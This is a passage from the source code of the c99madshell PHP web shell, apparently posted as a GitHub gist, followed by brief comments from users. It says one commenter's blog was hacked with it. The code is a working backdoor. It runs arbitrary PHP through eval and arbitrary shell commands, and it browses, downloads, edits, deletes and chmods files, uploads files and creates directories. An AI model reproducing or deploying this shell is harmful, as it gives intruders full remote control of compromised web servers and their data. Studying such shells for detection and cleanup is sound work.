else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} | |
if (@is_dir($v)){$row[] = $checkbox;} | |
else {$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='edit';document.todo.d.value='".$ud."';document.todo.submit();\">E</a> <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='download';document.todo.d.value='".$ud."';document.todo.submit();\">D</a> <a href=\"#\" onclick=\"document.todo.act.value='delete';document.todo.f.value='".$uo."';document.todo.ft.value='download';document.todo.d.value='".$ud."';document.todo.submit();\">X</a> ".$checkbox;} | |
if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} | |
elseif (@is_link($v)) {$tab["links"][] = $row;} | |
elseif (@is_dir($v)) {$tab["folders"][] = $row;} | |
elseif (@is_file($v)) {$tab["files"][] = $row;} | |
$i++; | |
} | |
} | |
//Compiling table | |
$table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); | |
echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; | |
foreach($table as $row) | |
{ | |
echo "<tr>\r\n"; | |
foreach($row as $v) {echo "<td>".$v."</td>\r\n";} | |
echo "</tr>\r\n"; | |
} | |
echo "</table><hr size=\"1\" noshade><p align=\"right\"> | |
<script> | |
function ls_setcheckboxall(status) | |
{ | |
var id = 0; | |
var num = ".(count($table)-2)."; | |
while (id <= num) | |
{ | |
document.getElementById('actbox'+id).checked = status; | |
id++; | |
} | |
} | |
function ls_reverse_all() | |
{ | |
var id = 0; | |
var num = ".(count($table)-2)."; | |
while (id <= num) | |
{ | |
document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; | |
id++; | |
} | |
} | |
</script> | |
<input type=\"button\" onclick=\"ls_setcheckboxall(1);\" value=\"Select all\"> <input type=\"button\" onclick=\"ls_setcheckboxall(0);\" value=\"Unselect all\"><b>"; | |
echo "<select name=act><option value=\"".$act."\">With selected:</option>"; | |
echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; | |
echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; | |
echo "</select> <input type=submit value=\"Confirm\"></p>"; | |
echo "</form>"; | |
} | |
} | |
if ($act == "eval") | |
{ | |
if (!empty($eval)) | |
{ | |
echo "<b>Result of execution this PHP-code</b>:<br>"; | |
$tmp = ob_get_contents(); | |
$olddir = realpath("."); | |
@chdir($d); | |
if ($tmp) | |
{ | |
ob_clean(); | |
eval($eval); | |
$ret = ob_get_contents(); | |
$ret = convert_cyr_string($ret,"d","w"); | |
ob_clean(); | |
echo $tmp; | |
if ($eval_txt) | |
{ | |
$rows = count(explode("\r\n",$ret))+1; | |
if ($rows < 10) {$rows = 10;} | |
echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; | |
} | |
else {echo $ret."<br>";} | |
} | |
else | |
{ | |
if ($eval_txt) | |
{ | |
echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; | |
eval($eval); | |
echo "</textarea>"; | |
} | |
else {echo $ret;} | |
} | |
@chdir($olddir); | |
} | |
else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} | |
echo "<form method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".@htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; | |
} | |
if ($act == "f") | |
{ | |
if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") | |
{ | |
if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} | |
else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='edit';document.todo.c.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><u>Create</u></a></center>";} | |
} | |
else | |
{ | |
$arr = array( | |
array("HTML","html"), | |
array("TXT","txt"), | |
array("CODE","code"), | |
array("DOWNLOAD","download"), | |
array("EDIT","edit"), | |
array("DELETE","delete") | |
); | |
$r = @file_get_contents($d.$f); | |
echo "<b>Viewing file: ".$f." (".view_size(@filesize($d.$f)).") ".view_perms_color($d.$f)."</b><br>"; | |
foreach($arr as $t) | |
{ | |
echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".$t[0]."</b></a>"; | |
echo " |"; | |
} | |
echo "<hr size=\"1\" noshade>"; | |
if ($ft == "download") | |
{ | |
@ob_clean(); | |
header("Content-type: application/octet-stream"); | |
header("Content-length: ".filesize($d.$f)); | |
header("Content-disposition: attachment; filename=\"".$f."\";"); | |
echo($r); | |
c99shexit(); | |
} elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} elseif ($ft == "html") | |
{ | |
if ($white) {@ob_clean();} | |
echo $r; | |
if ($white) {c99shexit();} | |
} elseif ($ft == "code") { | |
echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; | |
if (!empty($white)) {@ob_clean();} | |
highlight_file($d.$f); | |
if (!empty($white)) {c99shexit();} | |
echo "</div>"; | |
} elseif($ft== 'delete') { | |
if(!fs_rmobj($d.$f)){ | |
echo('<font color="red">Delete error</font>'); | |
} else { | |
echo('<font color="green">Delete succes</font>'); | |
} | |
} elseif ($ft == "edit") { | |
if (!empty($submit)) { | |
if(save_file($d.$f, $edit_text)) { | |
echo('<b>Saved!</b>'); | |
} else { | |
echo('<b>Can\'t write to file!</b>'); | |
} | |
$r = $edit_text; | |
} | |
echo "<form method=\"POST\"><input name='act' type='hidden' value='f'><input name='f' type='hidden' value='".urlencode($f)."'><input name='ft' type='hidden' value='edit'><input name='d' type='hidden' value='".urlencode($d)."'><input type=submit name=submit value=\"Save\"> <input type=\"reset\" value=\"Reset\"> <input type=\"button\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".addslashes(substr($d,0,-1))."';document.todo.submit();\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"180\" rows=\"25\">".htmlspecialchars($r)."</textarea></form>"; | |
} | |
} | |
} | |
?> | |
</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> | |
<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: Command execute ::</b></p></td></tr> | |
<tr><td width="50%" height="1" valign="top"><center><b>:: Enter ::</b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value=""><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>:: Select ::</b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td></tr></TABLE> | |
<br> | |
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> | |
<tr> | |
<td width="50%" height="1" valign="top"><center><b>:: Search ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> - regexp <input type=submit name=submit value="Search"></form></center></p></td> | |
<td width="50%" height="1" valign="top"><center><b>:: Upload ::</b><form method="POST" name="tod" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="file" name="uploadfile"><input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> | |
</tr> | |
</table> | |
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form method="POST"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> | |
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form method="POST"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form method="POST""><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td></tr></table> | |
<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99madshell v. <?php echo $shver; ?><a href="#" OnClick="document.todo.act.value='about';document.todo.submit();"><u> EDITED BY </b><b>MADNET, k1b0rg</u></b> </a> ]--</b></p></td></tr></table> | |
</body></html><?php chdir($lastdir); c99shexit(); ?> |
@antimatter15 posted a detailed analysis of this file and how he discovered his blog hacked back in 2014. It's hard to believe that it's still an effective hacking tool 9 years later.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Same. Either of you found out more?